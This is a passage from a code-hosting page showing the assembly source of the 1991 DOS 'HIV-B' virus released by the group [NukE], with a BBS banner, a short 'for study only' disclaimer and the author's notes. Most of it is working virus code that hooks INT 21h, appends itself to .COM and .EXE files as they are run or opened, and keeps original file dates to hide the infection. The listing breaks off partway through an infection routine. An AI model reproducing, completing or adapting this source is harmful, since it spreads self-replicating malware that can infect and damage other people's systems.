📄 hiv.asm
字号:
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
哪哪哪哪哪哪哪哪哪哪哪> HIV Virus Source :
HIV - VIRUS
Created: March 1991
Scan ID: [Murphy]
Origin: Italy ,"Italain Virus Laboratory!"
Sources: Produced by Rock Steady [NukE]
[NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup,
~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So
if you Scan it with SCAN McAfee & Ass. you will see that it will be
detected as the [Murphy] Virus! I got this Virus from Italy from the
"Italian Virus Laboratory!" Mind you this Virus Source is being
released to the public because it's an OLD Virus and is detectable!
and doesn't do any damage to the system! This virus was edited by
me, I removed some bugs inside and produced this SOURCE CODE ONLY!
[NOTE] Of course, this virus is ONLY for STUDYING, to learn on how
virus are made! After the viruses are old its NICE to release them so
people can study em!
HOW THE HIV - VIRUS WORKS
First, I'd like to thanx all those that thanked me for my latest
Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the
Source Codes to this virus in 6 MONTHS! Hopefully, by that time it
will be Detected by SCAN (McAfee & Ass) and yall will get a chance
to study this Assome Virus made totally from me...
HIV -: This virus Spreads thru coping itself to .EXE and .COM Files!
~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus
Hooks itself to Interrup 21h and totally system memory will be 1632
Bytes Less. Once the file is resident in Memory it will attach itself
to every file that is runned or opened! The date of the original file
Doesn't not change! All this virus does is Copy itself over and over
again! CleanUp V77+ will get rid of it...or Simple delete all files
Infected with the virus...Anywayz Enjoy...
NOTE: If you want to compile the source, simply look for it in the .TXT files
contained in DATA.EXE in this newsletter package.
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -